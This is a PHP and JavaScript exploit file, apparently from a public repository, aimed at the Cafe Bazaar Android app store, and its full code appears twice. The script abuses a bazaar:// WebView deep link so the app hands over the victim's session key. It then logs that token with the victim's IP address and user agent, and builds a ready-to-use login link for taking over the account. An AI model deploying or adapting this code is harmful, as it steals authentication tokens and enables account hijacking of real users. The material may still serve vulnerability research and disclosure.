Voorivex/Bazar-Exploit.php

## Bazar-Exploit.php
<?php
if (isset($_GET['key'])) {
	//Get authentication token
    $token = $_GET['key'];
    $login_link = "https://cafebazaar.ir/login/bysession?key=" . $token . "&next=/account/";
    $login_link = "Login link: <a href='" . $login_link . "' target='_blank'>" . $login_link . "</a>";
    if ($token == "") {
        $login_link = "Login Link: Failure! Victim not logged in.";
    }

	//Get victim's IP address
    if (!empty($_SERVER['HTTP_CLIENT_IP'])) {
        $IP = $_SERVER['HTTP_CLIENT_IP'];
    } elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
        $IP = $_SERVER['HTTP_X_FORWARDED_FOR'];
    } else {
        $IP = $_SERVER['REMOTE_ADDR'];
    }

	//Get current date
    date_default_timezone_set('Asia/Tehran');
    $date = date('m/d/Y H:i:s', time());

	//Save information to BazaarTokens.html
    file_put_contents("BazaarTokens.html", "IP address: " . $IP . "<br>WebView User-Agent: " . $_SERVER['HTTP_USER_AGENT'] . "<br>Date: " . $date . "<br>" . $login_link . "<hr>", FILE_APPEND);
}
?>
<html>

<body>

    <script>


        function Check() {
            if (navigator.userAgent.toLowerCase().indexOf("android") != -1) {
                Exploit()
            } else {//  Running device isn't Android
                document.body.innerText = "Exploit code should be tested on Android devices.";
            }
        }


        function Exploit() {//Open payload link automatically or ask the victim to click it.
            var payload = "bazaar://webview?title=&url=" + encodeURIComponent(document.location.href + "?key=%s") + "&is_internal=true&login=true";
            document.body.innerHTML += ("<a href='" + payload + "'><button>Click Me!</button></a>")
            document.location = payload;
        }


        if (document.location.href.indexOf("key") == -1) { //Run exploit code
            Check();
        } else { //Finished, Redirect victim to Divar page on CafeBazaar after successful exploitation...
            document.location = "bazaar://details?id=ir.divar"
        }


    </script>

</body>

</html>
	<?php
	if (isset($_GET['key'])) {
	//Get authentication token
	$token = $_GET['key'];
	$login_link = "https://cafebazaar.ir/login/bysession?key=" . $token . "&next=/account/";
	$login_link = "Login link: <a href='" . $login_link . "' target='_blank'>" . $login_link . "</a>";
	if ($token == "") {
	$login_link = "Login Link: Failure! Victim not logged in.";
	}

	//Get victim's IP address
	if (!empty($_SERVER['HTTP_CLIENT_IP'])) {
	$IP = $_SERVER['HTTP_CLIENT_IP'];
	} elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
	$IP = $_SERVER['HTTP_X_FORWARDED_FOR'];
	} else {
	$IP = $_SERVER['REMOTE_ADDR'];
	}

	//Get current date
	date_default_timezone_set('Asia/Tehran');
	$date = date('m/d/Y H:i:s', time());

	//Save information to BazaarTokens.html
	file_put_contents("BazaarTokens.html", "IP address: " . $IP . "<br>WebView User-Agent: " . $_SERVER['HTTP_USER_AGENT'] . "<br>Date: " . $date . "<br>" . $login_link . "<hr>", FILE_APPEND);
	}
	?>
	<html>

	<body>

	<script>



	function Check() {
	if (navigator.userAgent.toLowerCase().indexOf("android") != -1) {
	Exploit()
	} else {// Running device isn't Android
	document.body.innerText = "Exploit code should be tested on Android devices.";
	}
	}



	function Exploit() {//Open payload link automatically or ask the victim to click it.
	var payload = "bazaar://webview?title=&url=" + encodeURIComponent(document.location.href + "?key=%s") + "&is_internal=true&login=true";
	document.body.innerHTML += ("<a href='" + payload + "'><button>Click Me!</button></a>")
	document.location = payload;
	}



	if (document.location.href.indexOf("key") == -1) { //Run exploit code
	Check();
	} else { //Finished, Redirect victim to Divar page on CafeBazaar after successful exploitation...
	document.location = "bazaar://details?id=ir.divar"
	}



	</script>

	</body>

	</html>